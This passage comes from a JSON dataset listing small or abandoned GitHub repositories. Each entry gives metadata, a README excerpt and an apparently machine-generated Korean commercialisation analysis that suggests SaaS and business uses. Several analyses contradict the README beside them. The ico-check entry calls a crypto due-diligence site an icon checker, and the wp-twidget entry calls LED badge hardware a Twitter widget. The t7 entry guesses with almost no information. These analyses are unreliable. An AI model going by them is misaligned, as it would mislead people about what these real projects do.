모니터링 또는 관리 시스템으로 활용\n2. **API 판매*","readme_excerpt":"# vedetta (alpha)\n*Open*BSD Router Boilerplate\n\n![Vedetta Logo](https://avatars2.githubusercontent.com/u/29383850)\n## About\n> an opinionated, best practice, vanilla OpenBSD base configuration for bare-metal, or cloud routers\n\nWhat would an OpenBSD router configured using examples from the OpenBSD FAQ and Manual pages look like?\n\n## Features\nShare what you've got, keep what you need:\n* [acme-client](https://man.openbsd.org/acme-client) - Automatic Certificate Management Environment (ACME) client\n  - *Configure:*\n    - [`etc/acme`](src/etc/acme)\n    - [`etc/acme-client.conf`](src/etc/acme-client.conf)\n    - [`etc/httpd.conf`](src/etc/httpd.conf)\n    - [`etc/pf.conf`](src/etc/pf.conf)\n    - [`etc/relayd.conf`](src/etc/relayd.conf)\n    - [`etc/ssl/acme`](src/etc/ssl/acme)\n    - [`var/cron/tabs/root`](src/var/cron/tabs/root)\n    - `var/www/acme`\n    - [`var/www/htdocs/freedns.afraid.org`](src/var/www/htdocs/freedns.afraid.org)\n  - *Usage:*\n    - [`pfctl`](https://man.openbsd.org/pfctl)` -f ","composite_score":0.3015,"license_safety_tag":"safe"},{"name":"rasmusbergpalm/recurrent-relational-networks","github_url":"https://github.com/rasmusbergpalm/recurrent-relational-networks","stars":5,"language":"Python","license":"unknown","abandonment_months":43,"description":"# Recurrent Relational Networks 저장소 분석\n\n## 왜 보물인가\n복잡한 패턴을 인식하는 AI 기술로, 로봇이나 자동화 시스템이 상황을 더 똑똑하게 이해할 수 있게 만듭니다.\n\n## 어디에 쓸 수 있나\n\n1. **제조업 품질검사 SaaS**: 카메라로 제품 결함을 자동으로 찾아내는 클라우드 서비스\n2. **자율주행 차량 관제 API*","readme_excerpt":"# Recurrent Relational Networks for Complex Relational Reasoning\n\nContains the code to reproduce the experiments in the paper Recurrent Relational Networks for Complex Relational Reasoning\n\n### Sudoku\n\n * `python tasks/sudoku/train.py` will train a RRN with the hyper parameters from the paper and save the best model in the working directory\n * `python tasks/sudoku/test.py` will load the best model from the working directory and evaluate it on the test set\n\n\n### BaBi\n\n * `python tasks/babi/train.py` will train a RRN with the hyper parameters from the paper and save the best model in the working directory\n * `python tasks/babi/test.py` will load the best model from the working directory and evaluate it on the test set\n","composite_score":0.3015,"license_safety_tag":"unknown"},{"name":"vintasoftware/python-api-checklist","github_url":"https://github.com/vintasoftware/python-api-checklist","stars":6,"language":"","license":"unknown","abandonment_months":91,"description":"# Python API 체크리스트 (vintasoftware/python-api-checklist)\n\n## 왜 보물인가\n웹 서비스를 만들 때 필수적으로 확인해야 할 사항들을 미리 정리해둔 실전 가이드로, 개발자들의 실수를 줄이고 품질을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 유료 웹 서비스를 새로 론칭하는 회사들이 보","readme_excerpt":"[![alt text](https://s3-sa-east-1.amazonaws.com/www.vinta.com.br/images/dont_delete/devchecklist-logo.png \"Devchecklists Logo\")](https://devchecklists.com)\n\n# Python API Checklist\n\n## Adding a New Language:\n  * [ ] To add a new language you will need to create another markdown file containing the new [acronym language:](https://www.loc.gov/standards/iso639-2/php/code_list.php)\n    * E.g. `checklist-pt.md`.\n  * [ ] No further approval will be necessary;\n  * [ ] The new checklist language should be visible on Devckecklists after you saved the file on your repository.\n\n## Important Notes:\n  * [ ] Markdown is the only way to write checklists on Devchecklists;\n  * [ ] For tips about how to use markdown to write checklists, please take a look at these raw files:\n    * [ ] [`checklist-en.md`](https://raw.githubusercontent.com/vintasoftware/devchecklists-template/master/checklist-en.md) sample markdown;\n    * [ ] [`README.md`](https://raw.githubusercontent.com/vintasoftware/devchecklists-templ","composite_score":0.3015,"license_safety_tag":"unknown"},{"name":"BlockchainEduNet-HK/smart-contract-repo","github_url":"https://github.com/BlockchainEduNet-HK/smart-contract-repo","stars":7,"language":"Solidity","license":"unknown","abandonment_months":75,"description":"# BlockchainEduNet-HK/smart-contract-repo 분석\n\n## 왜 보물인가\n블록체인 기술을 배우고 실무에 적용할 수 있는 실제 계약 코드 모음으로, 암호화폐 및 금융 기술 교육이 필요한 시장에서 즉시 활용 가능한 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 교육 플랫폼 SaaS**: 온라인 강좌를 제공하는 회사에서 학생","readme_excerpt":"# Smart Contract Templates for Beginners \r\n![Turing Chain](https://imgur.com/lgpb2kF.png)\r\n## Blockchain Education Network @ Hong Kong & Taiwan\r\nSmart contract examples are in `examples/basic` and `examples/medium`\r\nHoneypots examples are in `honeypots/`\r\n\r\n## Welcome any pull request and contribution!! :)\r\n","composite_score":0.3014,"license_safety_tag":"unknown"},{"name":"kennethreitz/python-guide","github_url":"https://github.com/kennethreitz/python-guide","stars":9,"language":"Batchfile","license":"NOASSERTION","abandonment_months":39,"description":"# Python Guide 저장소 분석\n\n## 왜 보물인가\n파이썬이라는 프로그래밍 언어를 처음 배우는 사람들을 위한 완성도 높은 학습 가이드로, 전 세계 개발자들이 신뢰하는 표준 교재 역할을 하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 파이썬 입문자 강좌의 커리큘럼과 교재로 활용하여 구독료 수익화\n2. **기업 직원 교육 서","readme_excerpt":"Hitchhiker's Guide to Python\n============================\n\n**Python Best Practices Guidebook**\n\n→ Read the free guide at: `docs.python-guide.org <https://docs.python-guide.org>`_\n\n.. image:: https://farm1.staticflickr.com/628/33173824932_58add34581_k_d.jpg\n\n-----------\n\n**Work in progress. If you'd like to help, please do. There's a lot of work to\nbe done.**\n\nThis guide is currently under heavy development. This opinionated guide\nexists to provide both novice and expert Python developers a best practice\nhandbook to the installation, configuration, and usage of Python on a daily\nbasis.\n\n\nTopics include:\n\n- Platform and version-specific installations\n- Py2app, Py2exe, bbfreeze, pyInstaller\n- Pip\n- Numpy, scipy, statpy, pyplot, matplotlib\n- Virtualenv\n- Fabric\n- Exhaustive module recommendations, grouped by topic/purpose\n- Which libraries to use for what\n- Server configurations & tools for various web frameworks\n- Documentation: writing it\n- Testing: Jenkins & tox guides\n- How to easily i","composite_score":0.3014,"license_safety_tag":"unknown"},{"name":"fatherlinux/container-internals-lab","github_url":"https://github.com/fatherlinux/container-internals-lab","stars":6,"language":"Shell","license":"lgpl-3.0","abandonment_months":68,"description":"# Container Internals Lab 상용화 분석\n\n## 왜 보물인가\n컨테이너 기술(Docker, Kubernetes 등)이 현대 소프트웨어 산업의 표준이 되면서, 이를 깊이 있게 배울 수 있는 실습 교육 자료는 기업과 개발자에게 매우 부족한 상황입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 플랫폼**: 직원 기술 역량 강화를 위한 온라인","readme_excerpt":"# Background\nThis repository contains the labs scripts, files, and associated material for learn.openshift.com/subsystems. Directories are arranged by lab and step.\n\n- lab1-step3 - Containers mega-proc.sh script to pretty print daemons running on system\n- lab2-step1 - Contains Dockerfile for test builds\n- lab2-step4 - Containers Dockerfiles, Makefile, and OpenShift automated build files. Checked out during environmental init from the centos7 branch of the https://github.com/fatherlinux/container-internals-lab.git repository\n\nThe ASCII Doc conent for the actual lab is located here:\n\nhttps://github.com/fatherlinux/learn-katacoda/tree/master/subsystems\n\nThe associated presentation is located here:\n\nhttps://docs.google.com/presentation/d/1fC9cKR2-kFW5l-VEk0Z5_1vriYpROXOXM_5rhyVnBi4/edit#slide=id.gb6f3e2d2d_2_213\n\nIf you would like to contribute, feel free to reach out to smccarty@redhat.com or @fatherlinux on Twitter.\n","composite_score":0.3014,"license_safety_tag":"restricted"},{"name":"gozfree/libraries","github_url":"https://github.com/gozfree/libraries","stars":24,"language":"C","license":"mit","abandonment_months":22,"description":"# gozfree/libraries 분석\n\n## 왜 보물인가\n프로그래머들이 자주 사용하는 기본 기능들을 미리 만들어둔 도구 모음으로, 새로운 소프트웨어를 개발할 때 처음부터 다시 만들 필요 없이 빠르게 시작할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 음성/영상 통신 플랫폼이 필요한 협업 도구 개발 시 기본 라이브러리로 활용","readme_excerpt":"# Gear-Lib\n\nEnglish | [简体中文](README.cn.md)\n\n[![Build](https://travis-ci.org/gozfree/gear-lib.svg?branch=master)](https://travis-ci.org/gozfree/gear-lib)\n[![Release](https://img.shields.io/github/release/gozfree/gear-lib.svg)](https://github.com/gozfree/gear-lib/releases)\n[![License](https://img.shields.io/github/license/gozfree/gear-lib.svg)](https://github.com/gozfree/gear-lib/blob/master/LICENSE.MIT)\n\nThis is a collection of basic libraries.\n* All are written in POSIX C, aim to used compatibility on linux, windows, android, ios.\n* Aim to reuse for IOT, embedded and network service development\n\n![struct](./build/gear-lib.png)\n\n## Data Struct\n|  |  |\n|--|--|\n| libdict: Hash key-value dictonary library | libhash: Hash key-value library based on hlist from kernel |\n| libringbuffer: | libqueue: queue library, support memory hook |\n| librbtree: comes from linux kernel rbtree. | libsort: |\n| libvector: | libdarray: Dynamic array |\n\n## Network\n|  |  |\n|--|--|\n| librtsp: Real Time Streaming P","composite_score":0.3014,"license_safety_tag":"safe"},{"name":"edu2act/course-informationliteracy","github_url":"https://github.com/edu2act/course-informationliteracy","stars":12,"language":"","license":"unknown","abandonment_months":82,"description":"# edu2act/course-informationliteracy 분석\n\n## 왜 보물인가\n정보 문해력(올바른 정보를 구분하고 활용하는 능력)을 가르치는 교육 자료로, 디지털 시대에 필수적인 생활 기술을 체계적으로 전달할 수 있는 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼(SaaS)**: 학생과 일반인을 대상으로 정보 리터러시 과","readme_excerpt":"# 信息素养与实践（一）\n\n\n> 本课程是2017级学生专业必修课，主要介绍信息素养的内容及要求，以及计算机的操作与维护、网页浏览器的高级搜索技巧、虚拟机的基本操作、Photoshop基本操作、Git与GitHub等；\n\n&nbsp;\n\n## 课程大纲\n\n\n| 章节 | 简介 | 资料 |\n|-----|-----|-----|\n|01_课程概述|课程框架、课程形式、认识信息素养|[<img src=\"https://raw.githubusercontent.com/TelerikAcademy/Common/master/icons/presentation.png\" height=\"15\" />slides](/materials/slides/01-course-verview.pptx)|\n|02_网页处理软件|检索技巧、文献检索、常用网站、浏览器的简单使用|[<img src=\"https://raw.githubusercontent.com/TelerikAcademy/Common/master/icons/presentation.png\" height=\"15\" />slides](/materials/slides/02-web-browser-processes.ppt)|\n|03_计算机基本操作及管理|搜狗输入法、计算机基本操作、计算机基本维护、计算机基本故障处理|[<img src=\"https://raw.githubusercontent.com/TelerikAcademy/Common/master/icons/presentation.png\" height=\"15\" />slides](/materials/slides/03-computer-operation-and-managerment.ppt)|\n|04_信息管理|文件类别、命名规范、文件管理|[<img src=\"https://raw.githubusercontent.com/TelerikAcademy/Common/master/icons/presentation.png\" height=\"15\" />slides](/materials/slides/04-information-management.ppt)|\n|05_常用DOS命令|DOS简介、","composite_score":0.3014,"license_safety_tag":"unknown"},{"name":"ico-check/ico-check","github_url":"https://github.com/ico-check/ico-check","stars":10,"language":"HTML","license":"unknown","abandonment_months":76,"description":"# ico-check 프로젝트 분석\n\n## 왜 보물인가\n아이콘 파일들이 제대로 작동하는지 자동으로 확인해주는 도구로, 웹사이트나 앱 개발 시 이미지 오류를 빠르게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 디자인 팀을 위한 아이콘 관리 웹 서비스로 월 구독 제공\n2. **내부 업무 도구**: 기업의 개발팀이 배포 전 아이콘","readme_excerpt":"# [ICO-Check](https://icocheck.io/)\n\n[ICO-Check](https://icocheck.io/) is a community-driven website that lists the latest crypto projects and conducts due diligence on each one of them.            \n             \nWith the large number of crypto projects currently around, ICO-Check is an important tool that allows more transparency in the field, giving investors the confidence they need before deciding which tokens to buy.\n\n## Requesting a new crypto project background check\nCreate a new issue with title _company-name background check_. In the issue details provide url to the crypto project website.\n\n## Adding new checked crypto project\n1. Check if there exists issue to request background check for the crypto project. If not, create a new one.\n2. Fill the information from the [template](https://github.com/ico-check/ico-check/blob/master/.github/issue_template.md). Sample questions to ask when checking company:\n    - Where is your company registered? Could i have a copy of certificate of","composite_score":0.3014,"license_safety_tag":"unknown"},{"name":"fossasia/open-event-scraper","github_url":"https://github.com/fossasia/open-event-scraper","stars":11,"language":"Python","license":"mit","abandonment_months":123,"description":"# Open Event Scraper 사업화 분석\n\n## 왜 보물인가\n웹사이트에서 행사 정보를 자동으로 수집해주는 도구로, 수천 개의 행사 데이터를 수동 입력 없이 빠르게 확보할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **행사 검색 플랫폼 SaaS**: 전국 공연·전시회·세미나 정보를 자동 수집하여 통합 검색 서비스 제공\n2. **이벤트 회사 내부 ","readme_excerpt":"# open-event-scraper\n\nGoogle spreadsheet parsing for FOSSASIA 2016\n\n## setup\n\n```shell\npip install -r requirements.txt\n./run.sh\n```\n\n#Configuration on heroku server\n```shell\n\n$ heroku login\n\n$ heroku create\n\n$ git push heroku master\n\n$ heroku run bundle install\n\n$ heroku config:set GIT_REPO=fossasia/open-event-scraper\n$ heroku config:set GITHUB_TOKEN=Your token\n$ heroku config:set GH_TOKEN=Your token\n```\n\n## License\n\n[MIT](./LICENSE)\n","composite_score":0.3014,"license_safety_tag":"safe"},{"name":"fossasia/event-collect","github_url":"https://github.com/fossasia/event-collect","stars":11,"language":"Python","license":"unknown","abandonment_months":73,"description":"# fossasia/event-collect 상용화 분석\n\n## 왜 보물인가\n행사 참가자 정보를 자동으로 수집하고 관리해주는 도구로, 학회·컨퍼런스·전시회 주최자들의 수작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 행사 주최사들이 월 구독으로 참가자 등록·티켓팅 시스템을 쓰는 서비스\n2. **내부 업무 도구*","readme_excerpt":"# Event-Collect\n\n[![Build Status](https://travis-ci.org/fossasia/event-collect.svg?branch=master)](https://travis-ci.org/fossasia/event-collect)\n\nevent website listing to Open Event format scraper and converter\n\n#EventBrite Scraper\nGiven a query, scrapes EventBrite search results and downloads JSON files of each event using [Loklak's API](https://github.com/loklak/loklak_server/blob/development/docs/parsers.md#event-brite-crawler)\n\nUsage: \n```python scrape_eventbrite.py [SEARCH QUERY]```\n\nTo install all python dependencies required:\n```pip install -r requirements.txt```\n\nRunning that command will install:\n```\nrequests==2.10.0\nbeautifulsoup4==4.5.1\n```\n","composite_score":0.3014,"license_safety_tag":"unknown"},{"name":"zero-to-mastery/coding_challenge-24","github_url":"https://github.com/zero-to-mastery/coding_challenge-24","stars":27,"language":"","license":"unknown","abandonment_months":79,"description":"","readme_excerpt":"# Advent of Code 2019 (coding_challenge-24)\n\n![](./aoc.png)\n\n# What is Advent of Code?\n> Advent of Code is an Advent calendar of small programming puzzles for a variety of skill sets and skill levels that can be solved in any programming language you like **yes, including JavaScript and Python!!!**\n> Every day for 25 days this month you have small programming challenges that you need to solve to complete the \"tree\". Each day, the questions get a little bit harder to really push you to learn and improve your programming skills.\n\nWe have created a special area for the ZTM community to share their solutions and code each day, see what others have done, and vote for your favourite solution. We even have a leaderboard!\n\n# How to participate:\n### (This event starts December 1st, 2019 but you can join anytime. Solutions submitted on the day of the of the puzzle reveal will receive extra points!)\n1. Go to https://aoc.zerotomastery.io/ and click on the **ABOUT** to find out more about the chall","composite_score":0.3014,"license_safety_tag":"unknown"},{"name":"react-native-training/react-native-elements","github_url":"https://github.com/react-native-training/react-native-elements","stars":17,"language":"HTML","license":"mit","abandonment_months":81,"description":"# react-native-elements 분석\n\n## 왜 보물인가\n스마트폰 앱 개발에 필요한 기본 부품들을 미리 만들어둔 오픈소스 도구로, 개발자들의 개발 시간을 대폭 단축시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 플랫폼 SaaS**: 비개발자도 드래그 앤 드롭으로 스마트폰 앱을 만들 수 있는 노코드 플랫폼의 핵심 기술로 활용","readme_excerpt":"# React Native Elements\n\n## Announcement\n\nToday we moved the `react-native-elements` repo into its own Github organization. This is a move that allows us to have all our projects under a single place.\n\nHere's the new repo: https://github.com/react-native-elements/react-native-elements\n\nIf you are having any issues accessing the docs, please note that they are available at a new URL https://react-native-elements.github.io/react-native-elements/\n","composite_score":0.3013,"license_safety_tag":"safe"},{"name":"loklak/loklak_python_api","github_url":"https://github.com/loklak/loklak_python_api","stars":12,"language":"Python","license":"unknown","abandonment_months":96,"description":"# loklak_python_api 상용화 분석\n\n## 왜 보물인가\n트위터 같은 소셜 미디어 데이터를 쉽게 수집하고 분석할 수 있는 도구로, 마케팅·여론조사·트렌드 분석이 필요한 기업들에게 즉시 활용 가능한 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **소셜 미디어 분석 SaaS**: 기업 고객을 위해 \"경쟁사 브랜드 평판 모니터링\" 서비스로 월 구독료","readme_excerpt":"Python Loklak API\n-----------------\n\n|PyPI version| |Build Status| |Codecov branch| |Coverage Status| |Code\nHealth| |Dependency Status|\n\n--------------\n\nIf you want to create an alternative twitter search portal, the only way\nwould be to use the official twitter API to retrieve Tweets. But that\ninterface needs an OAuth account and it makes your search portal\ncompletely dependent on Twitters goodwill. The alternative is, to scrape\nthe tweets from the twitter html search result pages, but Twitter may\nstill lock you out on your IP address. To circumvent this, you need many\nclients accessing twitter to scrape search results. This makes it\nneccessary to create a distributed peer-to-peer network of twitter\nscrapers which can all organize, store and index tweets. This solution\nwas created with loklak.\n\nWhat is Loklak ?\n^^^^^^^^^^^^^^^^\n\nIt is a server application which is able to collect messages from\nvarious sources, including twitter. The server contains a search index\nand a peer-to-peer in","composite_score":0.3013,"license_safety_tag":"unknown"},{"name":"hzlshen/turntable","github_url":"https://github.com/hzlshen/turntable","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":104,"description":"# hzlshen/turntable 분석\n\n## 왜 보물인가\n회전판 게임이나 추첨 시스템을 간단하게 만들 수 있는 도구로, 카지노, 이벤트, 교육 현장에서 바로 활용 가능한 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **이벤트 회사의 SaaS 서비스**: 온라인 이벤트나 경품 추첨을 위한 회전판 도구를 구독 형식으로 제공\n2. **카지노/게임사","readme_excerpt":"# 大转盘小程序\n\n![Image text](https://github.com/hzlshen/Imgage_box/blob/master/turntable_img.png)\n\n![Image text](https://github.com/hzlshen/Imgage_box/blob/master/turntable_js.png)\n","composite_score":0.3013,"license_safety_tag":"unknown"},{"name":"secrary/IDA-scripts","github_url":"https://github.com/secrary/IDA-scripts","stars":11,"language":"Python","license":"unknown","abandonment_months":88,"description":"# secrary/IDA-scripts 분석 보고서\n\n## 왜 보물인가\n복잡한 프로그램을 분석하는 전문 도구에서 반복적인 작업을 자동화할 수 있는 스크립트 모음입니다.\n\n## 어디에 쓸 수 있나\n- **보안 회사의 악성코드 분석 SaaS**: 의심 파일을 자동으로 분석하고 위험도를 판정하는 온라인 서비스\n- **금융사 내부 감시 도구**: 직원들이 사용하는","readme_excerpt":"","composite_score":0.3013,"license_safety_tag":"unknown"},{"name":"trueadm/t7","github_url":"https://github.com/trueadm/t7","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":110,"description":"# trueadm/t7 보물 평가\n\n## 왜 보물인가\n저장소 정보가 매우 제한적이어서 실질적인 가치 판단이 어렵지만, 5개의 별(Star)과 2017년 유지된 활동으로 보아 특정 분야에서는 필요로 하는 도구일 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 관리자 또는 운영팀이 반복적인 작업을 자동화하는 솔루션으로 제공\n","readme_excerpt":"# t7.js\n\n## Overview\n\nt7.js is a small, lightweight JavaScript template library that compiles ES2015 template strings into virtual DOM objects.\n\n[Template strings](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/template_strings)\nallow for JavaScript expressions to be embedded within literal strings. With that in mind,\nit made logical sense to build a small library around them to assist developers\nwanting to work with virtual DOM frameworks without the overhead of learning a new\nlanguage. t7 does not introduce new syntax into the mix like\nother templating engines do, it simply uses pure JavaScript and HTML.\n\nt7 provides designers and developers with a way to create awesome\ntemplates that anyone with JavaScript knowledge can easily understand.\nLong gone are the days of having to learn something like Mustache, Handlebars, Jade or Underscore.\n\nUnlike JSX, t7 relies exclusively on ES 2015 features, so you can use any ES 2015 compliant build tools, linters, IDEs or syntax ","composite_score":0.3013,"license_safety_tag":"unknown"},{"name":"samchon/fake-toss-payments-server","github_url":"https://github.com/samchon/fake-toss-payments-server","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":15,"description":"# fake-toss-payments-server 평가 리포트\n\n## 왜 보물인가\n실제 결제 서비스처럼 동작하는 테스트 환경을 만들 수 있어서, 결제 기능 개발 시 실제 돈을 사용하지 않고도 안전하게 테스트할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **결제 기능이 있는 웹/앱 개발 회사**: 개발 단계에서 토스 결제 기능을 실제처럼 시뮬레이션하여 버","readme_excerpt":"# Payments System\n## Outline\n[![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/samchon/payments/tree/master/LICENSE)\n[![Build Status](https://github.com/samchon/payments/workflows/build/badge.svg)](https://github.com/samchon/payments/actions?query=workflow%3Abuild)\n\n통합 결제 시스템과 PG사 연동 라이브러리 모음.\n\n본 저장소 `@samchon/payments` 는 [통합 결제 시스템](https://github.com/samchon/payments/tree/master/packages/payment-backend)과 PG 사 연동 라이브러리를 모아놓은 저장소이다. 여기서 말하는 [통합 결제 시스템](https://github.com/samchon/payments/tree/master/packages/payment-backend)이란, [아임포트](https://github.com/samchon/payments/tree/master/packages/fake-iamport-server)와 [토스 페이먼츠](https://github.com/samchon/payments/tree/master/packages/fake-toss-payments-server) 등의 PG사들을 일괄 관리할 수 있는 시스템을 뜻한다. 더하여 [통합 결제 시스템](https://github.com/samchon/payments/tree/master/packages/payment-backend)은 MSA (Micro Service Architecture) 를 고려하여 설계된 프로젝트로써, 귀하의 서비스 중 결제 부문만을 따로이 분리하여 관리할 수 있게 해 준다.\n\n더하여 [통합 결제 시스템](https://gith","composite_score":0.3013,"license_safety_tag":"safe"},{"name":"humanmade/react-wp-scripts","github_url":"https://github.com/humanmade/react-wp-scripts","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":42,"description":"# react-wp-scripts 분석\n\n## 왜 보물인가\n웹사이트를 만드는 사람들이 복잡한 설정 없이 빠르게 개발할 수 있도록 도와주는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 워드프레스 기반 웹사이트 빌더 플랫폼에 내장하여 고객들이 자신의 사이트를 쉽게 커스터마이징하도록 제공\n2. **내부 업무 도구**: 웹사이트 ","readme_excerpt":"# react-wp-scripts\n\nA wrapper for create-react-app's [`react-scripts`](https://github.com/facebookincubator/create-react-app/tree/master/packages/react-scripts) to allow seamless usage of scripts and styles served from `webpack-dev-server` while developing a theme or plugin.\n\n**Important Note**: This project is brand new, and largely untested. We recommend using it as a learning tool rather than depending on it for critical development work.\n\n## Installation & Usage\n\nRun `npx create-react-app app-name --scripts-version react-wp-scripts --php-namespace=\"Your_Namespace\" /path/to/your/project/folder` to generate a new create-react-app project configured to use these custom scripts. \n\n- Replace `app-name` with the name of the app, as you want it to appear in the name index of package.json.\n- Replace `Your_Namespace` with the PHP namespace you would like to use for this file; it will default to `ReactWPScripts`.\n- Replace `/path/to/your/project/folder` with the directory, relative to curren","composite_score":0.3013,"license_safety_tag":"unknown"},{"name":"developers-against-repressions/devs-against-the-machine","github_url":"https://github.com/developers-against-repressions/devs-against-the-machine","stars":12,"language":"Python","license":"unknown","abandonment_months":42,"description":"# Developers Against The Machine - 상업화 분석\n\n## 왜 보물인가\n권력에 저항하는 개발자들의 네트워크로, 기술을 통해 사회 문제 해결을 추구하는 신념 있는 커뮤니티입니다.\n\n## 어디에 쓸 수 있나\n1. **시민 활동 플랫폼 SaaS**: 억압받는 사람들의 목소리를 모아 네트워크화하는 온라인 협력 도구\n2. **인권 단체 내부 ","readme_excerpt":"# devs-against-the-machine\n\n<p align=\"center\"><img src=\"https://i.ibb.co/KwJnv1b/logohack.jpg\" alt=\"valya\" border=\"0\" width=\"300\" height=\"300\"></p>\n\n<p align=\"center\"><a href=\"https://twitter.com/devs_against\">twitter</a> | <a href=\"https://www.facebook.com/devsagainstthemachine/\">facebook</a> | <a href=\"https://t-do.ru/devs_against\">telegram</a><p>\n\n## Онлайн-хакатон в поддержку политзаключенных 13-15 декабря\n\n[English version](README.en.md)\n\n## Что происходит?\n\nЛетом и осенью 2019 года мы стали свидетелями новой [волны политических репрессий в России](https://zona.media/theme/moscow-trial), поводом для которой стали мирные протесты из-за недопуска независимых кандидатов до выборов в Мосгордуму. Хотя акции проходили мирно, без порчи имущества и насилия со стороны демонстрантов, некоторые участники протестов были арестованы и приговорены [к реальным срокам заключения](https://www.interfax.ru/russia/675323). \n\nВ сентябре мы, представители IT-индустрии, написали [открытое письмо в защиту","composite_score":0.3013,"license_safety_tag":"unknown"},{"name":"fashiontec/bodyapps-android","github_url":"https://github.com/fashiontec/bodyapps-android","stars":12,"language":"Java","license":"lgpl-3.0","abandonment_months":105,"description":"# fashiontec/bodyapps-android 분석\n\n## 왜 보물인가\n스마트폰 카메라로 사람의 체형을 측정하고 가상으로 옷을 입혀볼 수 있는 기술로, 온라인 쇼핑에서 옷 사이즈 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 의류 판매 플랫폼**: 고객이 구매 전 스마트폰으로 옷을 가상으로 입어본 후 구매 결정\n2. **맞춤","readme_excerpt":"[![Build Status](https://travis-ci.org/fossasia/bodyapps-android.svg?branch=master)](https://travis-ci.org/fossasia/bodyapps-android)\n[![Join the chat at https://gitter.im/fossasia/bodyapps-android](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/bodyapps?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n# bodyapps-android\n\nAndroid app for the #bodyapps project with Gradle  \n\n## Communication\n\nPlease join our communication channels.\n\nMailing List at: https://groups.google.com/forum/#!forum/bodyapps\n\nGitter chat at: https://gitter.im/fossasia/bodyapps\n\n\n## Project Setup\n\nMain IDE used by the team is IntelliJ-based [Android Studio](https://developer.android.com/sdk/installing/studio.html). \nTo get started, download and install Android Studio, then choose \"Import Project\" and navigate to the project\nroot. Studio should import the Gradle-based structure without much ado.\n\n### Building\n\n* Install Google Play Services and Google repository usin","composite_score":0.3013,"license_safety_tag":"restricted"},{"name":"fossasia/wp-twidget","github_url":"https://github.com/fossasia/wp-twidget","stars":11,"language":"","license":"Apache-2.0","abandonment_months":8,"description":"# wp-twidget 프로젝트 분석\n\n## 왜 보물인가\n트위터(X) 콘텐츠를 웹사이트에 쉽게 삽입할 수 있는 도구로, 소셜 미디어와 웹사이트를 연결하는 간단한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 방문자 증대 SaaS**: 블로그나 뉴스 사이트가 월 구독으로 트위터 피드를 자동으로 표시하는 서비스\n2. **소셜 미디어 관리 내부 도구","readme_excerpt":"# Badge Magic Hardware\n\nThis repository contains the hardware design files for [Badge Magic](https://badgemagic.fossasia.org), an open-source LED badge platform that lets you create and display custom text, clipart, and animations over Bluetooth using the Badge Magic apps or Python libraries. While its latest hardware revision may not yet be mass-produced, it shares the same RISC-V chip as many other LED badges (e.g., LeSun, Victronics) but provides extra functionality, including a built-in microphone for real-time ambient sound visualization, external flash storage, and two top-mounted buttons that allow for mini-games and other interactive features. To see which functions are supported or in progress, visit the dedicated [firmware repository](https://github.com/fossasia/badgemagic-firmware). \n\n## PCB Layout\n\n**Front side**\n\n![Badge Magic LED front side](docs/images/BadgeMagic-front.png)\n\n**Back side**\n\n![Badge Magic LED back side](docs/images/BadgeMagic-back.png)\n\n## Applications and","composite_score":0.3013,"license_safety_tag":"safe"},{"name":"FezVrasta/bootstrap-material-design","github_url":"https://github.com/FezVrasta/bootstrap-material-design","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":61,"description":"# Bootstrap Material Design 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱을 예쁘고 통일감 있게 만들어주는 디자인 도구모음으로, 전문 디자이너 없이도 현대적인 외관을 갖춘 서비스를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n스타트업이 프로젝트 관리·CRM·회계 도구 등을 빠르게 만들고 출시할 때 기초 ","readme_excerpt":"## We moved to other repository!\n\nFind the new repository at https://github.com/mdbootstrap/bootstrap-material-design\n","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"SweetyTian/efficientdet","github_url":"https://github.com/SweetyTian/efficientdet","stars":9,"language":"Python","license":"unknown","abandonment_months":79,"description":"","readme_excerpt":"# efficientdet\nBiFPN and Modified BiFPN.\n\neffcientNet backbones and pretrained weights from @rwightman(https://github.com/rwightman/gen-efficientnet-pytorch)\n\n# TODO\ntrain and test\n","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"BarryYan/daily-warm","github_url":"https://github.com/BarryYan/daily-warm","stars":8,"language":"Go","license":"unknown","abandonment_months":79,"description":"","readme_excerpt":"# Daily-warm\n> 每天定时发邮件给你关心的人, 内容包含天气, one 的一句话, 一句英语, 一首古诗\n\n## Usage\n\n```bash\n# 1. Config `.env` file in root dir, e.g.\nMAIL_USERNAME = user@qq.com\nMAIL_PASSWORD = ***********\nMAIL_HOST = smtp.qq.com\nMAIL_PORT = 25\n# 每分钟发一次\nMAIL_CRON = \"0/1 * * * *\"\nMAIL_SUBJECT = 每日一暖, 温情一生\nMAIL_FROM = user<user@qq.com>\nMAIL_TO = [{\"email\": \"user<user@qq.com>\", \"local\": 